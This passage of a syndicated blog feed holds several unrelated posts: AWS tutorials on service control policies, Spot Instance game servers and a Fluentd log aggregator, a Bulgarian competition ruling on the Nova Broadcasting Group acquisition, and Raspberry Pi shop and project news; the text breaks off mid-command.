  3. The aws:PrincipalARN condition key returns the ARN of the principal making the request. You want to ignore the policy statement if the requesting principal is the AdminRole. Using the StringNotLike operator, assert that this SCP is in effect if the principal ARN is not the AdminRole. To do this, fill in the following values for your condition.
    1. Condition key: aws:PrincipalARN
    2. Qualifier: Default
    3. Operator: StringNotLike
    4. Value: arn:aws:iam::*:role/AdminRole
  4. Select Add condition. The following policy will appear in the edit window.
    
    {    
      "Version": "2012-10-17",
      "Statement": [
        {
          "Sid": "DenyChangesToAdminRole",
          "Effect": "Deny",
          "NotAction": [
            "iam:GetContextKeysForPrincipalPolicy",
            "iam:GetRole",
            "iam:GetRolePolicy",
            "iam:ListAttachedRolePolicies",
            "iam:ListInstanceProfilesForRole",
            "iam:ListRolePolicies",
            "iam:ListRoleTags"
          ],
          "Resource": [
            "arn:aws:iam::*:role/AdminRole"
          ],
          "Condition": {
            "StringNotLike": {
              "aws:PrincipalARN":"arn:aws:iam::*:role/AdminRole"
            }
          }
        }
      ]
    }
    
    

  5. After you validate the policy, select Save. If you already attached the policy in your organization, the changes will immediately take effect.

Now, the SCP denies all principals in the account from updating or deleting the AdminRole, except the AdminRole itself.

Next steps

You can now use SCPs to restrict access to specific resources, or define conditions for when SCPs are in effect. You can use the new functionality in your existing SCPs today, or create new permission guardrails for your organization. I walked through one example in this blog post, and there are additional use cases for SCPs that you can explore in the documentation. Below are a few that we have heard from customers that you may want to look at.

  • Account may only operate in certain AWS Regions (example)
  • Account may only deploy certain EC2 instance types (example)
  • Account requires MFA to be enabled before taking an action (example)

You can start applying SCPs using the AWS Organizations console, CLI, or API. See the Service Control Policies Documentation or the AWS Organizations Forums for more information about SCPs, how to use them in your organization, and additional examples.
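If you prefer the CLI, the following sketch shows one way to create and attach the example policy from this post. The file name, policy ID, and target account ID are placeholders you would replace with your own values.

# Save the policy JSON from step 9 to a local file, then create the SCP.
aws organizations create-policy \
  --name DenyChangesToAdminRole \
  --description "Prevents all IAM principals from making changes to AdminRole." \
  --type SERVICE_CONTROL_POLICY \
  --content file://deny-changes-to-admin-role.json

# Attach the policy to a target: an account ID, an OU ID, or the organization root.
aws organizations attach-policy \
  --policy-id p-examplepolicyid \
  --target-id 123456789012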

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Michael Switzer

Mike is the product manager for the Identity and Access Management service at AWS. He enjoys working directly with customers to identify solutions to their challenges, and using data-driven decision making to drive his work. Outside of work, Mike is an avid cyclist and outdoorsperson. He holds a master’s degree in computational mathematics from the University of Washington.

КЗК approves the acquisition of Нова Броудкастинг Груп

Post Syndicated from nellyo original https://nellyo.wordpress.com/2019/03/22/cpc-nova/

Адванс Медиа Груп, a company connected with К. Домусчиев and Г. Домусчиев, intends to acquire sole control of „Нова Броудкастинг Груп“ АД.

The КЗК (Commission on Protection of Competition) has received a request to assess the transaction and to rule that it does not constitute a concentration; or to rule that the concentration does not fall within the scope of Article 24 of the Competition Protection Act (ЗЗК); or to approve the concentration, since it does not lead to the establishment or strengthening of a dominant position that would significantly impede effective competition on the relevant market.

The КЗК's ruling is particularly interesting in light of its recent decision refusing to allow Келнер to acquire Нова Броудкастинг Груп:

Given the characteristics of each of the relevant markets in the media sector, it was established that the group being acquired has significant financial and organisational resources, the ability to achieve economies of scale and scope, and an established image. The significant number of mass media outlets that the combined group would have at its disposal would give it a substantial advantage over the other participants providing media services.

In its analysis of the notified transaction, the Commission takes into account the leading positions of the target undertaking in the field of media services, which in turn raises justified concerns about the effect of the transaction on the competitive environment in the above markets, as well as the horizontal overlap between the activities of the parties to the concentration on the online commerce market.

In this way, the parties to the concentration would have both the incentive and a real opportunity to change their commercial policy in various ways, such as restricting access, raising prices, or changing the terms of concluded contracts. In view of the above, and given the acquiring company's significant experience and its investment intentions, the transaction creates the preconditions for the establishment or strengthening of a dominant position that would significantly impede competition on the relevant markets. Such conduct would restrict and harm not only competition on the market but also the interests of end consumers, given the public importance of the media.

On 21 March 2019, the КЗК announced its decision, this time approving the transaction:

The activities actually carried out by „Нова“ include:

  • creating television content for its own use, as well as acquiring rights to distribute television content;
  • distributing television content – „Нова“ creates and distributes seven television channels with national coverage: „Нова телевизия“, „Диема“, „Кино Нова“, „Диема Фемили“, „Нова спорт“, „Диема спорт“ and „Диема спорт 2“;
  • television advertising – „Нова“ sells access to its audience by broadcasting advertising material for advertisers and advertising agencies on the channels listed above;
  • maintaining websites that mainly provide information about the programmes of the TV channels it operates, as well as the ability to watch some of the broadcasts online – https://nova.bg/, https://play.nova.bg/, https://diemaxtra.nova.bg/, https://play.diemaxtra.bg/, http://www.diema.bg, https://kino.nova.bg/, https://diemafamily.nova.bg/. In addition, Нова has developed the Play DiemaXtra service, which consists of a website and a mobile application that allow linear viewing of the Диема Спорт and Диема Спорт 2 channel package, as well as of individual sporting events chosen by the user (PPV);
  • providing services (…..)*.

The company „Атика Ева“ АД, controlled by „Нова Броудкастинг Груп“ АД, specialises in publishing the monthly magazines Eva, Playboy, Esquire, Joy, Grazia and OK, through which it carries out publishing activities, trade in printed works, and advertising in print media. The company also administers the websites of some of these magazines, where it sells online advertising on its own behalf.

The other undertakings controlled by „Нова Броудкастинг Груп“ АД – through „Нет Инфо“ АД – provide the following key products and services:

  • web-based email (www.abv.bg), which allows end users to open mailboxes and exchange messages; the site http://www.abv.bg also lets end users build an address book and communicate with other users in virtual chat rooms and online forums;
  • online directories – a platform for organising, storing and sharing files online – http://www.dox.bg;
  • search – in cooperation with the international provider of this service, Google, the company offers web search on its main pages – http://www.abv.bg and http://www.gbg.bg;
  • news and information – Нет Инфо provides digital news and information through the news site http://www.vesti.bg, the specialised sports news site http://www.gong.bg, the weather site http://www.sinoptik.bg, the financial information site http://www.pariteni.bg and the site for the modern woman http://www.edna.bg;
  • car classifieds – http://www.carmarket.bg allows users to publish and browse listings for the sale of cars;
  • price checking and product comparison – through http://www.sravni.bg internet users can compare the prices of products sold in various online shops.

Markets on which the transaction will have an impact.
The acquiring group carries out a wide range of activities in the country and participates in numerous markets in different areas. The target undertaking and the companies under its control operate on markets in the media field (television, print and internet). A certain link between their activities exists on the market for television content, and more precisely in the segment of acquiring distribution rights, on which the target undertaking „Нова Броудкастинг Груп“ АД operates together with „Футбол Про Медия“ ЕООД, part of the group of the acquirer „Адванс Медиа Груп“ ЕАД.
„Футбол Про Медия“ ЕООД has concluded contracts as follows:
(…..)* On the basis of these contracts, (…..). From the above it can be concluded that „Футбол Про Медия“ ЕООД carries out activities related to (…..) television distribution rights. The „Нова“ group also creates and buys television content.
Consequently, the transaction will have an impact only on the market for television content, and in particular on the acquisition of distribution rights ((…..)*), where there is some overlap between the activities of the parties to the concentration.

The КЗК takes into account the fact that the parties to the transaction are not direct competitors on the relevant market and that their relationship is vertical, determined by the capacity in which each of them operates: „Футбол Про Медия“ ЕООД acts as a (…..)* of rights, while the target undertaking is a buyer of television rights.
By their nature, the rights to broadcast sporting events are exclusive, and it is common commercial practice for them to be held by a single undertaking for a defined period of time and territory. In the case under review (…..). Based on the data analysed, the Commission accepts that a significant number of content traders operate on the relevant market, from which the television operators in Bulgaria buy the rights to broadcast sporting events. The presence of a large number of competitors, including established foreign names, leads to the conclusion that they will be able to exert effective competitive pressure on the new economic group, which will not be independent of them in its commercial behaviour. In addition, in view of the requirements of the Radio and Television Act (ЗРТ) and the characteristics of the product “television content”, the КЗК finds that the market for television content has surmountable barriers and is open to the entry of new participants. In its analysis, the Commission also takes into account the fact that (…..).
In view of the above, and insofar as the undertakings participating in the concentration operate at different levels of the television content market, the Commission finds that the notified transaction will not significantly change the market position of НБГ on the relevant market and, accordingly, has no potential to harm the competitive environment on it.
On the basis of the assessment carried out, it can be concluded that the planned concentration does not lead to the creation or strengthening of a dominant position that would significantly restrict or impede effective competition on the relevant market analysed. Consequently, the notified transaction could not give rise to anticompetitive effects and should be approved unconditionally under Article 26(1) of the ЗЗК.

The concentration is approved.

The Raspberry Pi shop, one month in

Post Syndicated from Gordon Hollingworth original https://www.raspberrypi.org/blog/the-raspberry-pi-shop-one-month-in/

Five years ago, I spent my first day working at the original Pi Towers (Starbucks in Cambridge). Since then, we’ve developed a whole host of different products and services which our customers love, but there was always one that we never got around to until now: a physical shop. (Here are opening times, directions and all that good stuff.)

Years ago, my first idea was rather simple: rent a small space for the Christmas month and then open a pop-up shop just selling Raspberry Pis. We didn’t really know why we wanted to do it, but suspected it would be fun! We didn’t expect it to take five years to organise, but last month we opened the first Raspberry Pi store in Cambridge’s Grand Arcade – and it’s a much more complete and complicated affair than that original pop-up idea.

Given that we had access to a bunch of Raspberry Pis, we thought that we should use some of them to get some timelapse footage of the shop being set up.

Raspberry Pi Shop Timelapse

Uploaded by Raspberry Pi on 2019-03-22.

The idea behind the shop is to reach an audience that wouldn’t necessarily know about Raspberry Pi, so its job is to promote and display the capabilities of the Raspberry Pi computer and ecosystem. But there’s also plenty in there for the seasoned Pi hacker: we aim to make sure there’s something for you whatever your level of experience with computing is.

Inside the shop you’ll find a set of project centres. Each one contains a Raspberry Pi project tutorial or example that will help you understand one advantage of the Raspberry Pi computer, and walk you through getting started with the device. We start with a Pi running Scratch to control a GPIO pin, turning an LED on and off. Another demos a similar project in Python, reading a push button and lighting three LEDs (can you guess what colour the three LEDs are?). You can also see project centres based around Kodi and RetroPie demonstrating our hardware (the TV HAT and the Pimoroni Picade console), and an area demonstrating the various Raspberry Pi computer options.

store front

There is a soft seating area, where you can come along, sit and read through the Raspberry Pi books and magazines, and have a chat with the shop staff. There are also shelves of stock with which you can fill yer boots: not just official Raspberry Pi products, but merchandise from across the ecosystem, totalling nearly 300 different lines (with more to come). Finally, we’ve got the Raspberry Pi engineering desk, where we’ll try to answer even the most complex of your questions.

Come along, check out the shop, and give us your feedback. Who knows – maybe you’ll find some official merchandise you can’t buy anywhere else!

The post The Raspberry Pi shop, one month in appeared first on Raspberry Pi.

Win a Raspberry Pi 3B+ and signed case this Pi Day 2019

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/win-raspberry-pi-3b-pi-day/

Happy Pi Day everyone

What is Pi Day, we hear you ask? It’s the day when countries that write their dates as month/day/year see the date match the first digits of pi: 3.14, or 3.14.2019 to be exact.

In celebration of Pi Day, we’re running a Raspberry Pi 3B+ live stream on YouTube. Hours upon hours of our favourite 3B+ in all its glorious wonderment.

PI DAY 2019

Celebrate Pi Day with us by watching this Pi

At some point today, we’re going to add a unique hashtag to that live stream, and anyone who uses said hashtag across Instagram and/or Twitter* before midnight tonight (GMT) will be entered into a draw to win a Raspberry Pi Model 3 B+ and an official case, the latter of which will be signed by Eben Upton himself.

Raspberry Pi - PI Day 2019

So sit back, relax, and enjoy the most pointless, yet wonderful, live stream to ever reach the shores of YouTube!

*For those of you who don’t have a Twitter or Instagram account, you can also comment below with the hashtag when you see it.

The post Win a Raspberry Pi 3B+ and signed case this Pi Day 2019 appeared first on Raspberry Pi.

Play Heverlee’s Sjoelen and win beer

Post Syndicated from Rob Zwetsloot original https://www.raspberrypi.org/blog/play-heverlees-sjoelen-win-beer/

Chances are you’ve never heard of the Dutch table shuffleboard variant Sjoelen. But if you have, then you’ll know it has a basic premise – to slide wooden pucks into a set of four scoring boxes – but some rather complex rules.

Sjoelen machine

Uploaded by Grant Gibson on 2018-07-10.

Sjoelen

It may seem odd that a game which relies so much on hand-eye coordination and keeping score could be deemed a perfect match for a project commissioned by a beer brand. Yet Grant Gibson is toasting success with his refreshing interpretation of Sjoelen, having simplified the rules and incorporated a Raspberry Pi to serve special prizes to the winners.

“Sjoelen’s traditional scoring requires lots of addition and multiplication, but our version simply gives players ten pucks and gets them to slide three through any one of the four gates within 30 seconds,” Grant explains.

As they do this, the Pi (a Model 3B) keeps track of how many pucks are sliding through each gate, figures out how much time the player has left, and displays a winning message on a screen. A Logitech HD webcam films the player in action, so bystanders can watch their reactions as they veer between frustration and success.

Taking the plunge

Grant started the project with a few aims in mind: “I wanted something that could be transported in a small van and assembled by a two-person team, and I wanted it to have a vintage look.” Inspired by pinball tables, he came up with a three-piece unit that could be flat-packed for transport, then quickly assembled on site. The Pi 3B proved a perfect component.

Grant has tended to use full-size PCs in his previous builds, but he says the Pi allowed him to use less complex software, and less hardware to control input and output. He used Python for the input and output tasks and to get the Pi to communicate with a full-screen Chromium browser, via JSON, in order to handle the scoring and display tasks in JavaScript.

“We used infrared (IR) sensors to detect when a puck passed through the gate bar to score a point,” Grant adds. “Because of the speed of the pucks, we had to poll each of the four IR sensors over 100 times per second to ensure that the pucks were always detected. Optimising the Python code to run fast enough, whilst also leaving enough processing power to run a full-screen web browser and HD webcam, was definitely the biggest software challenge on this project.”

Bottoms up

The Raspberry Pi’s GPIO pins are used to trigger the dispensing of a can of Heverlee beer to the winner. These are stocked inside the machine, but building the vending mechanism was a major headache, since it needed to be lightweight and compact, and to keep the cans cool.

No off-the-shelf vending unit offered a solution, and Grant’s initial attempts with stepper motors and clear laser-cut acrylic gears proved disastrous. “After a dozen successful vends, the prototype went out of alignment and started slicing through cans, creating a huge frothy fountain of beer. Impressive to watch, but not a great mix with electronics,” Grant laughs.

Instead, he drew up a final design that was laser-cut from poplar plywood. “It uses automotive central locking motors to operate a see-saw mechanism that serves the cans. A custom Peltier-effect heat exchanger, and a couple of salvaged PC fans, keep the cans cool inside the machine,” reveals Grant.

“I’d now love to make a lightweight version sometime, perhaps with a folding Sjoelen table and pop-up scoreboard screen, that could be carried by one person,” he adds. We’d certainly drink to that.

More from The MagPi magazine

Get your copy now from the Raspberry Pi Press store, major newsagents in the UK, or Barnes & Noble, Fry’s, or Micro Center in the US. Or, download your free PDF copy from The MagPi magazine website.

MagPi 79 cover

Subscribe now

Subscribe to The MagPi on a monthly, quarterly, or twelve-monthly basis to save money against newsstand prices!

Twelve-month print subscribers get a free Raspberry Pi 3A+, the perfect Raspberry Pi to try your hand at some of the latest projects covered in The MagPi magazine.

The post Play Heverlee’s Sjoelen and win beer appeared first on Raspberry Pi.

Running your game servers at scale for up to 90% lower compute cost

Post Syndicated from Roshni Pary original https://aws.amazon.com/blogs/compute/running-your-game-servers-at-scale-for-up-to-90-lower-compute-cost/

This post is contributed by Yahav Biran, Chad Schmutzer, and Jeremy Cowan, Solutions Architects at AWS

Many successful video games, such as Fortnite: Battle Royale, Warframe, and Apex Legends, use a free-to-play model, which offers players access to a portion of the game without paying. Such games are no longer low quality and now demand premium-like production values. The business model is constrained on cost, and Amazon EC2 Spot Instances offer a viable low-cost compute option. Casual multiplayer games naturally fit the Spot offering, and with the orchestration of Amazon EKS containers and the mechanisms available to minimize player impact and optimize cost when running multiplayer game-server workloads, hardcore multiplayer games fit the Spot Instance offering as well.

Spot Instances offer spare compute capacity available in the AWS Cloud at steep discounts compared to On-Demand Instances. Spot Instances enable you to optimize your costs and scale your application’s throughput up to 10 times for the same budget. Spot Instances are best suited for fault-tolerant workloads. Multiplayer game-servers are no exception: a game-server state is updated using real-time player inputs, which makes the server state transient. Game-server workloads can be disposable and take advantage of Spot Instances to save up to 90% on compute cost. In this blog, we share how to architect your game-server workloads to handle interruptions and effectively use Spot Instances.

Characteristics of game-server workloads

Simply put, multiplayer game servers spend most of their life updating current character position and state (mostly animation). The rest of the time is spent on image updates that result from combat actions, moves, and other game-related events. More specifically, game servers’ CPUs are busy doing network I/O operations by accepting client positions, calculating the new game state, and multi-casting the game state back to the clients. That makes a game server workload a good fit for general-purpose instance types for casual multiplayer games and, preferably, compute-optimized instance types for the hardcore multiplayer games.

AWS provides a wide variety of both compute-optimized (C5 and C4) and general-purpose (M5) instance types as Amazon EC2 Spot Instances. Because capacities fluctuate independently for each instance type in an Availability Zone, you can often get more compute capacity for the same price when using a wide range of instance types. For more information on Spot Instance best practices, see Getting Started with Amazon EC2 Spot Instances.

One solution that customers use for running dedicated game servers is Amazon GameLift. This solution uses Amazon GameLift FleetIQ to deploy a fleet of Spot Instances in an AWS Region. FleetIQ places new sessions on game servers based on player latencies, instance prices, and Spot Instance interruption rates so that you don’t need to worry about Spot Instance interruptions. For more information, see Reduce Cost by up to 90% with Amazon GameLift FleetIQ and Spot Instances on the AWS Game Tech Blog.

In other cases, you can use game-server deployment patterns like containers-based orchestration (such as Kubernetes, Swarm, and Amazon ECS) for deploying multiplayer game servers. Those systems manage a large number of game-servers deployed as Docker containers across several Regions. The rest of this blog focuses on this containerized game-server solution. Containers fit the game-server workload because they’re lightweight, start quickly, and allow for greater utilization of the underlying instance.

Why use Amazon EC2 Spot Instances?

A Spot Instance is a natural choice for running a disposable game-server workload because of its built-in two-minute interruption notice, which allows for graceful handling. We demonstrate two examples of notification handling, through instance metadata and Amazon CloudWatch. For more information, see the “Interruption handling” and “What if I want my game-server to be redundant?” sections later in this blog.

Spot Instances also offer a variety of EC2 instances types that fit game-server workloads, such as general-purpose and compute-optimized (C4 and C5). Finally, Spot Instances provide low termination rates. The Spot Instance Advisor can help you choose a good starting point for determining which instance types have lower historical interruption rates.

Interruption handling

Avoiding player impact is key when using Spot Instances. Here is a strategy to avoid player impact that we apply in the proposed reference architecture and code examples available at Spotable Game Server on GitHub. Specifically, for Amazon EKS, node drainage requires draining the node via the kubectl drain command. This makes the node unschedulable and evicts the pods currently running on the node with a graceful termination period (terminationGracePeriodSeconds) that might impact the player experience. As a result, pods continue to run while a signal is sent to the game to end it gracefully.

Node drainage

Node drainage requires an agent pod that runs as a DaemonSet on every Spot Instance host to pull potential spot interruption from Amazon CloudWatch or instance metadata. We’re going to use the Instance Metadata notification. The following describes how termination events are handled with node drainage:

  1. Launch the game-server pod with a default of 120 seconds (terminationGracePeriodSeconds). As an example, see this deploy YAML file on GitHub.
  2. Provision a worker node pool with a mixed instances policy of On-Demand and Spot Instances. It uses the Spot Instance allocation strategy with the lowest price. For example, see this AWS CloudFormation template on GitHub.
  3. Use the Amazon EKS bootstrap tool (/etc/eks/bootstrap.sh in the recommended AMI) to label each node with its instance lifecycle, either OnDemand or Spot. For example:
    • OnDemand: "--kubelet-extra-args --node-labels=lifecycle=ondemand,title=minecraft,region=uswest2"
    • Spot: "--kubelet-extra-args --node-labels=lifecycle=spot,title=minecraft,region=uswest2"
  4. A daemon set deployed on every node pulls the termination status from the instance metadata endpoint. When a termination notification arrives, the `kubectl drain node` command is executed, and a SIGTERM signal is sent to the game-server pod. You can see these commands in the batch file on GitHub, and a minimal sketch of the polling loop follows this list.
  5. The game server keeps running for the next 120 seconds to allow the game to notify the players about the incoming termination.
  6. No new game-server is scheduled on the node to be terminated because it’s marked as unschedulable.
  7. A notification to an external system such as a matchmaking system is sent to update the current inventory of available game servers.
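The following is a minimal sketch of the polling loop described in step 4. It assumes the agent pod has a node-scoped kubeconfig and that NODE_NAME is injected through the pod spec; it is not the exact script from the GitHub repository.

#!/bin/bash
# Poll the EC2 instance metadata endpoint for a Spot interruption notice.
# The spot/instance-action document returns HTTP 404 until an interruption is scheduled.
while true; do
  HTTP_CODE=$(curl -s -o /dev/null -w '%{http_code}' \
    http://169.254.169.254/latest/meta-data/spot/instance-action)
  if [ "$HTTP_CODE" -eq 200 ]; then
    # Cordon and drain the node; the game-server pod receives SIGTERM and keeps
    # running for terminationGracePeriodSeconds (120s) so it can notify players.
    kubectl drain "$NODE_NAME" --ignore-daemonsets --force --grace-period=120
    break
  fi
  sleep 5
done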

Optimization strategies for Kubernetes specifications

This section describes a few recommended strategies for Kubernetes specifications that enable optimal game server placements on the provisioned worker nodes.

  • Use single Spot Instance Auto Scaling groups as worker nodes. To accommodate the use of multiple Auto Scaling groups, we use Kubernetes nodeSelector to control the game-server scheduling on any of the nodes in any of the Spot Instance–based Auto Scaling groups.
    nodeSelector:
      lifecycle: spot
      title: your game title

  • The lifecycle label is populated upon node creation through the AWS CloudFormation template in the following section:
    BootstrapArgumentsForSpotFleet:
      Description: Sets Node Labels to set lifecycle as Ec2Spot
      Default: "--kubelet-extra-args --node-labels=lifecycle=spot,title=minecraft,region=uswest2"
      Type: String

  • You might have a case where the incoming player actions are served by UDP and masking the interruption from the player is required. Here, the game-server allocator (a Kubernetes scheduler for us) schedules more than one game server as target upstream servers behind a UDP load balancer that multicasts any packet received to the set of game servers. After the scheduler terminates the game server upon node termination, the failover occurs seamlessly. For more information, see “What if I want my game-server to be redundant?” later in this blog.

Reference architecture

The following architecture describes an instance mix of On-Demand and Spot Instances in an Amazon EKS cluster of multiplayer game servers. Within a single VPC, the control plane node pools (Master Host and Storage Host) are highly available and thus run On-Demand Instances. The game-server hosts/nodes use a mix of Spot and On-Demand Instances. The control plane's API server is accessible via an Elastic Load Balancing Application Load Balancer with a preconfigured allow list.

What if I want my game server to be redundant?

A game server is a sessionful workload, but it traditionally runs as a single dedicated game server instance with no redundancy. For game servers that use TCP as the transport network layer, AWS offers Network Load Balancers as an option for distributing player traffic across multiple game servers’ targets. Currently, game servers that use UDP don’t have similar load balancer solutions that add redundancy to maintain a highly available game server.

This section proposes a solution for the case where game servers deployed as containerized Amazon EKS pods use UDP as the network transport layer and are required to be highly available. We’re using the UDP load balancer because of the Spot Instances, but the choice isn’t limited to when you’re using Spot Instances.

The following diagram shows a reference architecture for implementing a UDP load balancer based on Amazon EKS. It requires an Amazon EKS cluster set up as suggested above and a set of components that simulate an architecture supporting multiplayer game services. For example, this includes a game-server inventory that captures the running game servers, their status, and allocation placement. The Amazon EKS cluster is on the left, and the proposed UDP load-balancer system is on the right. A new game server is reported to an Amazon SQS queue and persisted in an Amazon DynamoDB table. When a player assignment is required, the matchmaking service queries an API endpoint for an optimal available game server through the game-server inventory that uses the DynamoDB tables.

The solution includes the following main components:

  • The game server (see mockup-udp-server at GitHub). This is a simple UDP socket server that accepts a delta of a game state from connected players and multicasts the updated state based on pseudo computation back to the players. It’s a single threaded server whose goal is to prove the viability of UDP-based load balancing in dedicated game servers. The model presented here isn’t limited to this implementation. It’s deployed as a single-container Kubernetes pod that uses hostNetwork: true for network optimization.
  • The load balancer (udp-lb). This is a containerized NGINX server loaded with the stream module. The load balancer's upstream set is configured upon initialization based on the dedicated game-server state that is stored in the DynamoDB table game-server-status-by-endpoint. Available load balancer instances are also stored in a DynamoDB table, lb-status-by-endpoint, to be used by core game services such as a matchmaking service.
  • An Amazon SQS queue that captures the initialization and termination of game servers and load balancers instances deployed in the Kubernetes cluster.
  • DynamoDB tables that persist the state of the cluster with regards to the game servers and load balancer inventory.
  • An API operation based on AWS Lambda (game-server-inventory-api-lambda) that serves the game servers and load balancers an updated list of the available resources (a short usage sketch follows this list). The operation supports /get-available-gs, which the load balancer needs to set its upstream target game servers. It also supports /set-gs-busy/{endpoint} for labeling already claimed game servers from the available game servers inventory.
  • A Lambda function (game-server-status-poller-lambda) that the Amazon SQS queue triggers and that populates the DynamoDB tables.
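As a rough illustration of how a load balancer pod might call these operations, the following sketch assumes the API is exposed at a base URL stored in GAME_API; the URL, the endpoint address in the path, and the shape of the response are illustrative placeholders rather than the exact contract of the sample code.

# Ask the inventory API for available game servers to use as upstream targets.
curl -s "$GAME_API/get-available-gs"

# After a game server is claimed for a match, mark it as busy so it is removed
# from the available inventory (the path parameter is the game-server endpoint).
curl -s "$GAME_API/set-gs-busy/10.0.1.23:5000"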

Scheduling mechanism

Our goal in this example is to reduce the chance that two game servers that serve the same load-balancer game endpoint are interrupted at the same time. Therefore, we need to prevent the scheduling of the same game servers (mockup-UDP-server) on the same host. This example uses advanced scheduling in Kubernetes where the pod affinity/anti-affinity policy is being applied.

We define two soft labels, mockup-grp1 and mockup-grp2, in the podAntiAffinity section as follows:

      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
            - labelSelector:
                matchExpressions:
                  - key: "app"
                    operator: In
                    values:
                      - mockup-grp1
              topologyKey: "kubernetes.io/hostname"

The requiredDuringSchedulingIgnoredDuringExecution tells the scheduler that the subsequent rule must be met upon pod scheduling. The rule says that pods that carry the value of key: “app” mockup-grp1 will not be scheduled on the same node as pods with key: “app” mockup-grp2 due to topologyKey: “kubernetes.io/hostname”.

When a load balancer pod (udp-lb) is scheduled, it queries the game-server-inventory-api endpoint for two game-server pods that run on different nodes. If this request isn’t fulfilled, the load balancer pod enters a crash loop until two available game servers are ready.

Try it out

We published two examples that guide you on how to build an Amazon EKS cluster that uses Spot Instances. The first example, Spotable Game Server, creates the cluster, deploys Spot Instances, Dockerizes the game server, and deploys it. The second example, Game Server Glutamate, enhances the game-server workload and enables redundancy as a mechanism for handling Spot Instance interruptions.

Conclusion

Multiplayer game servers have relatively short-lived processes that last from a few minutes to a few hours. The current average observed life span of Spot Instances in US and EU Regions ranges from a few hours to a few days, which makes Spot Instances a good fit for game servers. Amazon GameLift FleetIQ offers native and seamless support for Spot Instances, and Amazon EKS offers mechanisms to significantly minimize the probability of interrupting the player experience. This makes Spot Instances an attractive option not only for casual multiplayer game servers but also for hardcore game servers. Game studios that use Spot Instances for multiplayer game servers can save up to 90% of the compute cost, benefiting them as well as delighting their players.

Building a scalable log solution aggregator with AWS Fargate, Fluentd, and Amazon Kinesis Data Firehose

Post Syndicated from Anuneet Kumar original https://aws.amazon.com/blogs/compute/building-a-scalable-log-solution-aggregator-with-aws-fargate-fluentd-and-amazon-kinesis-data-firehose/

This post is contributed by Wesley Pettit, Software Dev Engineer, and a maintainer of the Amazon ECS CLI.

Modern distributed applications can produce gigabytes of log data every day. Analysis and storage is the easy part. From Amazon S3 to Elasticsearch, many solutions are available. The hard piece is reliably aggregating and shipping logs to their final destinations.

In this post, I show you how to build a log aggregator using AWS Fargate, Amazon Kinesis Data Firehose, and Fluentd. This post is unrelated to the AWS effort to support Fluentd to stream container logs from Fargate tasks. Follow the progress of that effort on the AWS container product roadmap.

Solution overview

Fluentd forms the core of my log aggregation solution. It is an open source project that aims to provide a unified logging layer by handling log collection, filtering, buffering, and routing. Fluentd is widely used across cloud platforms and was adopted by the Cloud Native Computing Foundation (CNCF) in 2016.

AWS Fargate provides a straightforward compute environment for the Fluentd aggregator. Kinesis Data Firehose streams the logs to their destinations. It batches, compresses, transforms, and encrypts the data before loading it, which minimizes the amount of storage used at the destination and increases security.

The log aggregator that I detail in this post is generic and can be used with any type of application. However, for simplicity, I focus on how to use the aggregator with Amazon Elastic Container Service (ECS) tasks and services.

Building a Fluentd log aggregator on Fargate that streams to Kinesis Data Firehose

 

The diagram describes the architecture that you are going to implement. A Fluentd aggregator runs as a service on Fargate behind a Network Load Balancer. The service uses Application Auto Scaling to dynamically adjust to changes in load.

Because the load balancer DNS can only be resolved in the VPC, the aggregator is a private log collector that can accept logs from any application in the VPC. Fluentd streams the logs to Kinesis Data Firehose, which dumps them in S3 and Amazon Elasticsearch Service (Amazon ES).

Not all logs are of equal importance. Some require real time analytics, others simply need long-term storage so that they can be analyzed if needed. In this post, applications that log to Fluentd are split up into frontend and backend.

Frontend applications are user-facing and need rich functionality to query and analyze the data present in their logs to obtain insights about users. Therefore, frontend application logs are sent to Amazon ES.

In contrast, backend services do not need the same level of analytics, so their logs are sent to S3. These logs can be queried using Amazon Athena, or they can be downloaded and ingested into other analytics tools as needed.

Each application tags its logs, and Fluentd sends the logs to different destinations based on the tag. Thus, the aggregator can determine whether a log message is from a backend or frontend application. Each log message gets sent to one of two Kinesis Data Firehose streams:

  • One streams to S3
  • One streams to an Amazon ES cluster

Running the aggregator on Fargate makes maintaining this service easy, and you don’t have to worry about provisioning or managing instances. This makes scaling the aggregator simple. You do not have to manage an additional Auto Scaling group for instances.

Aggregator performance and throughput

Before I walk you through how to deploy the Fluentd aggregator in your own VPC, you should know more about its performance.

I performed extensive real-world testing with this aggregator setup to test its limits. Each task in the aggregator service can handle at least 9 MB/s of log traffic, and at least 10,000 log messages/second. These are comfortable lower bounds for the aggregator’s performance. I recommend using these numbers to provision your aggregator service based upon your expected throughput for log traffic.

While this aggregator set up includes dynamic scaling, you must carefully choose the minimum size of the service. This is because dynamic scaling with Fluentd is complicated.

The Fluentd aggregator accepts logs via TCP connections, which are balanced across the instances of the service by the Network Load Balancer. However, these TCP connections are long-lived, and the load balancer only distributes new TCP connections. Thus, when the aggregator scales up in response to increased load, the new Fargate tasks cannot help with any of the existing load. The new tasks can only take new TCP connections. This also means that older tasks in the aggregator tend to accumulate connections over time. This is an important limitation to keep in mind.

For the Docker logging driver for Fluentd (which can be used by ECS tasks to send logs to the aggregator), a single TCP connection is made when each container starts. This connection is held open as long as possible. A TCP connection can remain open as long as data is still being sent over it, and there are no network connectivity issues. The only way to guarantee that there are new TCP connections is to launch new containers.

Dynamic scaling can only help in cases where there are spikes in log traffic and new TCP connections. If you are using the aggregator with ECS tasks, dynamic scaling is only useful if spikes in log traffic come from launching new containers. On the other hand, if spikes in log traffic come from existing containers that periodically increase their log output, then dynamic scaling can’t help.

Therefore, configure the minimum number of tasks for the aggregator based upon the maximum throughput that you expect from a stable population of containers. For example, if you expect 45 MB/s of log traffic, then I recommend setting the minimum size of the aggregator service to five tasks, so that each one gets 9 MB/s of traffic.

For reference, here is the resource utilization that I saw for a single aggregator task under a variety of loads. The aggregator is configured with four vCPU and 8 GB of memory as its task size. As you can see, CPU usage scales linearly with load, so dynamic scaling is configured based on CPU usage.
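For reference, CPU-based target tracking for the Fargate service can be wired up with Application Auto Scaling along the following lines; the cluster and service names, capacity bounds, and target value below are illustrative assumptions rather than values from the reference architecture.

# Register the Fargate service as a scalable target, with a floor sized for steady-state load.
aws application-autoscaling register-scalable-target \
  --service-namespace ecs \
  --resource-id service/log-aggregator-cluster/fluentd-aggregator \
  --scalable-dimension ecs:service:DesiredCount \
  --min-capacity 5 \
  --max-capacity 15

# Track average CPU utilization, since CPU usage scales roughly linearly with log traffic.
aws application-autoscaling put-scaling-policy \
  --policy-name fluentd-cpu-target-tracking \
  --service-namespace ecs \
  --resource-id service/log-aggregator-cluster/fluentd-aggregator \
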